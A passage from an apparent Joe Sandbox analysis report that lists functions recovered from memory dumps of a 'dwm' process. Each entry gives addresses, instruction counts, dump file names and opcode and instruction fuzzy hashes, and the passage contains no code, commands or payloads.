Instruction Fuzzy Hash: BA213D62E5E98A5FE784DA6858451F8B7E1FF25390754457BC01EC3593DE19B809C302

Function 00007FF887B1162F Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86efb384c20c97d1573ea98716b0e72cef2c95575c4b5cdfb62bf4d0c6ce0571
Instruction ID: 7574065797f67fbfc579919cb384a23eb047f0be38570373f55af0cca862fcb5
Opcode Fuzzy Hash: 86efb384c20c97d1573ea98716b0e72cef2c95575c4b5cdfb62bf4d0c6ce0571
Instruction Fuzzy Hash: F221E675D5851D8FEB88EB98C494AFDBBF2FF58351F14417AD00AE7291CA386980CB50

Function 00007FF887B26C21 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bba6c86c5fc204534b69bc7b53c5eb31483fa99f57348ec4cc70ed02c336e15
Instruction ID: e4e517074d37dff3c3f9767272cb1feb44cbe91f11ed9d499d96b358f53da851
Opcode Fuzzy Hash: 5bba6c86c5fc204534b69bc7b53c5eb31483fa99f57348ec4cc70ed02c336e15
Instruction Fuzzy Hash: C1219A34D6990DCFCB98EB58C8906FC7BB2FF99301F90007AD00AE36A1CA386845CB40

Function 00007FF887B27B27 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 646dcae7939ea120b7f51c96be6ef5ab75187f8750cc518814ef863698d4bae2
Instruction ID: 62fa6587cf1460d986a2ba0c2ea4ae09dac28bfc218117df8da6485748256d21
Opcode Fuzzy Hash: 646dcae7939ea120b7f51c96be6ef5ab75187f8750cc518814ef863698d4bae2
Instruction Fuzzy Hash: F7116030718A188FDB98DB1CD855AA9B3E2FF59311B4142BED14ED7662DB31AC41CB41

Function 00007FF887B18B3F Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9fa64bce581105ce8200d2091ec72031a69c4fded5d7129c52866948b0070fe
Instruction ID: a80657fd551c189353554bdca1927e0cc4424de029ab406742ff80673529010f
Opcode Fuzzy Hash: d9fa64bce581105ce8200d2091ec72031a69c4fded5d7129c52866948b0070fe
Instruction Fuzzy Hash: 9021C37188E3C91FD7039B705C665EA7FB4AF03224F0A41EBE488CA4E3C62D5196C362

Function 00007FF887B11085 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dba85499d69cd3330a56f29fb3b48abf2e977b4296bbfd3473f3ecaf164ac63
Instruction ID: 090cef8f5bec5549f5e0c011d3fddad7c0a944047e646704579ca6fb1a94981e
Opcode Fuzzy Hash: 3dba85499d69cd3330a56f29fb3b48abf2e977b4296bbfd3473f3ecaf164ac63
Instruction Fuzzy Hash: 8011DC36A8C59ECBDB21AA58EC542EE37B1FB85360F0402BBC404D7195DB6C2529C6D1

Function 00007FF887B10E40 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74e4f707032f5a109cf3e985b305ece9bc2465da4a786f6559e74b814e7456f5
Instruction ID: e3449fe809b92a5a1c6a691083f30593330ef2649756401117bd6d67355b1dbe
Opcode Fuzzy Hash: 74e4f707032f5a109cf3e985b305ece9bc2465da4a786f6559e74b814e7456f5
Instruction Fuzzy Hash: 3621A275D4D28E8FE7029B60C8042FE7BB2FF16345F144176C025D61D6DA3C5509CBA1

Function 00007FF887B26CE1 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3456d41748d4d3e2d75921243932b4245ee22d11224acc176898493ccc8eadf
Instruction ID: f8cebeaa0c7ba1ef604e2c1341daa01eaea8f928c2b6ff2fd3ec079c83cc2895
Opcode Fuzzy Hash: e3456d41748d4d3e2d75921243932b4245ee22d11224acc176898493ccc8eadf
Instruction Fuzzy Hash: 8F11D331CEF58B8AF23A5264681157D15727F473DAF9801BAC40E87CD2CC4C28619293

Function 00007FF887B27ACC Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fce33a21fd25dddb6a47ca74f008a14e2e293887da5b4887120daa05ccdcee8
Instruction ID: ea866807bca3be549759e2a0793fcbcd22923df17b8c6943344dfaac0d70b932
Opcode Fuzzy Hash: 4fce33a21fd25dddb6a47ca74f008a14e2e293887da5b4887120daa05ccdcee8
Instruction Fuzzy Hash: 1E112530A18A088FD798DB28D86A6BCB3E2FF59320B40017ED14ED76A1CB35A841CB04

Function 00007FF887B1FEA1 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c546560e0a04f26f30abebe3f81892308bf68fbb6c806608c21f8738e2334d
Instruction ID: 91d863a5b807170d1fc66dcf67be8c5d6dda3458c4edc6e919f2ed780893c2bf
Opcode Fuzzy Hash: 19c546560e0a04f26f30abebe3f81892308bf68fbb6c806608c21f8738e2334d
Instruction Fuzzy Hash: 5801D231D4D69E8FDB51DF64A8002FD77B5FF4A310F000176E408E3182DB645914C791

Function 00007FF887B2BDE9 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6bdc723e1fc14055c1de79817de4f48d93444d6f1e1d2ef9b96973b64359931
Instruction ID: 70daba0d2ac2436fdff8dee50fd00960eb781fa98e7034da6869334227665e34
Opcode Fuzzy Hash: a6bdc723e1fc14055c1de79817de4f48d93444d6f1e1d2ef9b96973b64359931
Instruction Fuzzy Hash: BA11DD70C8E28A8EEB169BA0C8147FE7BB2BF05344F04047AD545E72C2EE7C5649CB42

Function 00007FF887B29020 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e41f01b33bd715838e7f13d25c963e19222306de2d890753c725001cba5d4b
Instruction ID: 672ada39b699c7a1a51fc3d9becfd86e27ea848709dedb3db525268ba4829d10
Opcode Fuzzy Hash: 18e41f01b33bd715838e7f13d25c963e19222306de2d890753c725001cba5d4b
Instruction Fuzzy Hash: A0112730AADA494FCB94DB249451ABD77A2FF55360B80053ED14EC38D3DD18E549C381

Function 00007FF887B26718 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de2e50f5d7eb45bc2e640c8f773b29d1d4bdacb6831d0ac3353e1667adada1b3
Instruction ID: 6bd5234b259dfcecb9f4c0a6ced4cb37b530b64bc53f66e4ac5652ed49301981
Opcode Fuzzy Hash: de2e50f5d7eb45bc2e640c8f773b29d1d4bdacb6831d0ac3353e1667adada1b3
Instruction Fuzzy Hash: E321AEB0C5920A9FDB44EFA4C8456FEBBF2FF04345F80053AD005A7291CB789500CB51

Function 00007FF887B255F5 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b052cff0e24690c4e9b8043ed98049d85eef7744f9ff16ffec9279338b4d52
Instruction ID: 2b9fd99a4a7a98c62ad19556ba54ffb6faa2ac27270fd7fefa36443b39c10caf
Opcode Fuzzy Hash: f7b052cff0e24690c4e9b8043ed98049d85eef7744f9ff16ffec9279338b4d52
Instruction Fuzzy Hash: D101DF32CACA4E8FDB59CB94D8101FD77B2FF88390F8005B6C10AD2291EE282914CB51

Function 00007FF887B10DC9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd96feb690db20b51b4cad6730675c9aced846f3a0b1e597a3a1c6a2c44dc632
Instruction ID: 3a8e4d460995dee444f9e0e28b468d8936809192b46be188469de301a356d51e
Opcode Fuzzy Hash: dd96feb690db20b51b4cad6730675c9aced846f3a0b1e597a3a1c6a2c44dc632
Instruction Fuzzy Hash: 0E115871D4D24E8FEB119BA1C8082BE7BB2FF49340F14857AC025D62D6DA3C6644CBA1

Function 00007FF887B28E9E Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d621afa158fa16fd60aa7bbe16b6342806efbe56633ed923ec418526a388280
Instruction ID: d3a43674133ae5f74a42dbdac0775fa97ddab5dffa50234d96989b325c79328d
Opcode Fuzzy Hash: 0d621afa158fa16fd60aa7bbe16b6342806efbe56633ed923ec418526a388280
Instruction Fuzzy Hash: 4411893138D64A4FD704CF28C4A47E837A2EFA5360F54027EDA49C76D2DA6EE594C741

Function 00007FF887B116F4 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 096e9895a192513c42349919ca986a983479d4654fb9bebbcb05098c05fb2d7c
Instruction ID: 51b7f3bc408d4f3c073005981121e349f1b421ff23d67420450f2d948e5ab2b8
Opcode Fuzzy Hash: 096e9895a192513c42349919ca986a983479d4654fb9bebbcb05098c05fb2d7c
Instruction Fuzzy Hash: 7411873088E3C94FD7439BB08868AD87FB4EF47210F1904EBD488CB0A3C66D594AC722

Function 00007FF887B1FF85 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6868507e582b153dbf659161e4dd3aa9df717c154f9f6dc9453a476e26f977b
Instruction ID: 36698e4e5b7dd95089fe7889e1a23840e0e08e5d8b09fcb0fdea8ea88b06c573
Opcode Fuzzy Hash: a6868507e582b153dbf659161e4dd3aa9df717c154f9f6dc9453a476e26f977b
Instruction Fuzzy Hash: 6901B13089E2C95FD7069B209C165E97FB4EF06310F0900F7E85CC70A2DA6C6669C7A2

Function 00007FF887B114A0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e1da867147ef8c64c103477fad45c03b4549d3299c748723cc983b39ed7f2e1
Instruction ID: 7f6ffa2078dff0b42003c73cfd4b34f057cd73f0172681bde4af9bf4f77fbfd7
Opcode Fuzzy Hash: 0e1da867147ef8c64c103477fad45c03b4549d3299c748723cc983b39ed7f2e1
Instruction Fuzzy Hash: C9012C3148E3C98FC7179BB488612A57FB5BF07244F0A44EBD495CB4E3D62C6869CB62

Function 00007FF887B1FC5D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21717d6dacc7be407bf52cf49fa11dc730ad5020ca112a456d33b705014126c1
Instruction ID: 5f5d3eef9073d95621f5015488044b8c6beeffb344933782c93717b9c847ed87
Opcode Fuzzy Hash: 21717d6dacc7be407bf52cf49fa11dc730ad5020ca112a456d33b705014126c1
Instruction Fuzzy Hash: 3901863188D2899FD7029B60CC48AE97FF4FF4B350F0945EAD448C7152D67C5595C751

Function 00007FF887B1E845 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f6dfe8d7913fb29fbe50c3d2f29163846c76c0b22885315fb209a54bd99d734
Instruction ID: 8785a3b4c8d99794a82520be814553167b6f3f58cc4517f2d42ec0a22844b852
Opcode Fuzzy Hash: 4f6dfe8d7913fb29fbe50c3d2f29163846c76c0b22885315fb209a54bd99d734
Instruction Fuzzy Hash: 66012132C8C2C98FE718ABA894492FC7FB2FF19340F8040BAD80CC24A2DE28A544C341

Function 00007FF887B26571 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4153f9db15ee755d5975ae2a772bdcd2d42f2e0e833ebae8806ad9fed82187
Instruction ID: ef3e9c450e31409d223a6f124151490301ec73c78798f796b7bcf0ecf9aa2d5b
Opcode Fuzzy Hash: 6d4153f9db15ee755d5975ae2a772bdcd2d42f2e0e833ebae8806ad9fed82187
Instruction Fuzzy Hash: 6901AD71C9D68D5FE754EB6098492FC7BB2BF1A340F9000BAD009C359AEE286944C341

Function 00007FF887B19241 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b40070784ab824596b0f99cf5aea5445b3b63b7cae349778520bf4066b461f39
Instruction ID: 6508d103eacc4bd2735b4d850300c48eed3e1a405133a30a9033da3558a9c78b
Opcode Fuzzy Hash: b40070784ab824596b0f99cf5aea5445b3b63b7cae349778520bf4066b461f39
Instruction Fuzzy Hash: 91016D30C4C6CD8FEB90EF6888496ED7BF1FF29300F4505A6E418C6192EB749554C740

Function 00007FF887B19301 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03875ae7743990425cef09958144d7e193f0fa2f4873f7662f900f583e682948
Instruction ID: 6a32284b32e430b2d569c8f725f1f1dd699c7116b10b264e20fb882a029f6082
Opcode Fuzzy Hash: 03875ae7743990425cef09958144d7e193f0fa2f4873f7662f900f583e682948
Instruction Fuzzy Hash: 03014F709586CD8FDB91EF68C8496ED3BF1FF68341F0505AAE808C7191D738A550CB41

Function 00007FF887B24731 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a55f6d436e679744b82a2627b3fc9bb8e7a48001b5a083e3d268f3c3e224c52
Instruction ID: 9989887ddd3b1751255f4e6466150c9056f96810365b2a18592ad0f6bf4dce04
Opcode Fuzzy Hash: 8a55f6d436e679744b82a2627b3fc9bb8e7a48001b5a083e3d268f3c3e224c52
Instruction Fuzzy Hash: 37F04F3095968C8FDB94EF18D848AED3BF0FF29301F4404AAE818C7661DB34D954CB41

Function 00007FF887B10A79 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1696552343bd0bee7d0c554458209a33e13f8c92f26924898eac780a998c2147
Instruction ID: 8a7a145c6a1105767be20c01e800b0d6299b0ed1fe876de535a24333b6d7c447
Opcode Fuzzy Hash: 1696552343bd0bee7d0c554458209a33e13f8c92f26924898eac780a998c2147
Instruction Fuzzy Hash: 6A01A23189D7C98FE756AB6488682FD7FF0FF56340F4900BAD499C60D3DA285858C721

Function 00007FF887B1E7D5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a65a0498084873d8a6c15e1f772072632a7480faff2cce24ef8fc69b6a6b6ee9
Instruction ID: 1895c556604844976424463ecc485ec626c231f6be01e21b4442f41aa5e0fe08
Opcode Fuzzy Hash: a65a0498084873d8a6c15e1f772072632a7480faff2cce24ef8fc69b6a6b6ee9
Instruction Fuzzy Hash: 83F0DC71C4C6C98FEB54EF6498196ED7FB1FF19340F0505BBE808C25A2DA38A594CB42

Function 00007FF887B28008 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b63e8b182d36a8cf6e636577bb58692df8f65ca68da0c0e29e67e44da2cd911
Instruction ID: d58a02e0550958b0383d2fb48e303bad248ee52088a2f3bfe494d051ab4136e8
Opcode Fuzzy Hash: 7b63e8b182d36a8cf6e636577bb58692df8f65ca68da0c0e29e67e44da2cd911
Instruction Fuzzy Hash: EE018130B5E95A8BDB58C71C909003DB7B2FF447A47904279D01A87186CF28FC12CB85

Function 00007FF887B246D1 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41b39d1f3cb22bc9a0fb130ae93e3f1a395b8b32130835f6fd91c47d3b4a5ad
Instruction ID: 603b8c43c003ec1c90a5af6bcaa1319b5ed62b80fef9570527517fd8766c1f50
Opcode Fuzzy Hash: a41b39d1f3cb22bc9a0fb130ae93e3f1a395b8b32130835f6fd91c47d3b4a5ad
Instruction Fuzzy Hash: FFF0903085D28C8FDB55EF6498442ED7BB0FF1A300F4404BAE818C6592EB389554CB41

Function 00007FF887B1E705 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7adfc9bb327e16236b8366adb02f2c355906a9392c56803b37c5f84a8db6d069
Instruction ID: 02c7bd32017f58261b06d3c4fa924d20040b57d0f73c4a10f4257473ec1d16a6
Opcode Fuzzy Hash: 7adfc9bb327e16236b8366adb02f2c355906a9392c56803b37c5f84a8db6d069
Instruction Fuzzy Hash: 24F0A931C4C689CFEB95AF6488156ED7BA1FF12340F0808BBE42CC20A2DA28A454CB52

Function 00007FF887B18BE1 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7de35b06e044251dcc2ce87e3d589db9f3e451344ec03839bbabcf81dea4a9e4
Instruction ID: 016887ced51aeffc7e6bd45ab69c5b67fb91a3de81cd69e7b48f424e7a8f01eb
Opcode Fuzzy Hash: 7de35b06e044251dcc2ce87e3d589db9f3e451344ec03839bbabcf81dea4a9e4
Instruction Fuzzy Hash: B2F0BE3188D78D8FDB55EF1888812EE3BB2FF54350F44017AE408C6192DB39D460C791

Function 00007FF887B18DA1 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12e7a24f3635e54904d64d83948dad970889327cb97f318237c9b1a65c4a2ceb
Instruction ID: 663e40d55b15e7af7f4d0bb362aa5cb11ca51e695f46d9d8a9f26ed327209f4f
Opcode Fuzzy Hash: 12e7a24f3635e54904d64d83948dad970889327cb97f318237c9b1a65c4a2ceb
Instruction Fuzzy Hash: 15F09A3199968D8FEB41EF6488882ED7FF1FF19350F4405BAE808C21A2EA789550C741

Function 00007FF887B25F35 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 335ed991654485526609cbbc3cce02128204061a3a4bfda3adba99dc823f3c8f
Instruction ID: 510d944c0d17e2e30513614c851059efe2a848e368aae39f636edf73693fd01c
Opcode Fuzzy Hash: 335ed991654485526609cbbc3cce02128204061a3a4bfda3adba99dc823f3c8f
Instruction Fuzzy Hash: DDF082318EE2C85FD71657202C124FA7F78EE02254B4A01E7E558CB893D55D665AC3A2

Function 00007FF887B272F2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07fc0107ff682c2639678b8b2842d22358d10c637563c3695fd3865dd1f07a76
Instruction ID: 9781158c7399407deab4a65eb6b95699717231dbb5185e2b9ad49e2d243a1022
Opcode Fuzzy Hash: 07fc0107ff682c2639678b8b2842d22358d10c637563c3695fd3865dd1f07a76
Instruction Fuzzy Hash: B0F0C23189F2C69FD3128B7088114D93FB6BF43244B4800E6D945CB0A2C52C2607C3A2

Function 00007FF887B18258 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f960c09bfc880d210bc216983e48492bca6776e684cb63d623fcc33833949a
Instruction ID: ceecfe941d909a9e5d83bae2f63a8bfc0924fa9bac576b4fe6addeb5fe6e6ac4
Opcode Fuzzy Hash: d1f960c09bfc880d210bc216983e48492bca6776e684cb63d623fcc33833949a
Instruction Fuzzy Hash: BDF01730D58A8E9EEB90EFA898486FD77F5FF28300F510576E81DD2190DB34A150CB90

Function 00007FF887B10A90 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a6c8467c7a2a1b734b61c043462a20e9519e34132237cf758660c4d7c99235d
Instruction ID: 48474a8b1dfbf00396fd827bf9c2e1a96d963294ee48624602779604a1ea09c8
Opcode Fuzzy Hash: 4a6c8467c7a2a1b734b61c043462a20e9519e34132237cf758660c4d7c99235d
Instruction Fuzzy Hash: 2FF0E930CAC68DDAEB54EB7494582FD7BF0FF19344F440076D45DC20C1DA346594C661

Function 00007FF887B119A5 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd0dce4601a60b5749fc8479aee88137d115ff94671302774dbd669a1363810e
Instruction ID: 1d517529ceb31345dbfe7ea372d72b5d2f274e6b4e89ee6d9aeefb3525096ddb
Opcode Fuzzy Hash: dd0dce4601a60b5749fc8479aee88137d115ff94671302774dbd669a1363810e
Instruction Fuzzy Hash: 76F0907099864D8FDB04EF68C8496ED7BF1FF44340F4401BAD818C3181DB749161C740

Function 00007FF887B2C059 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

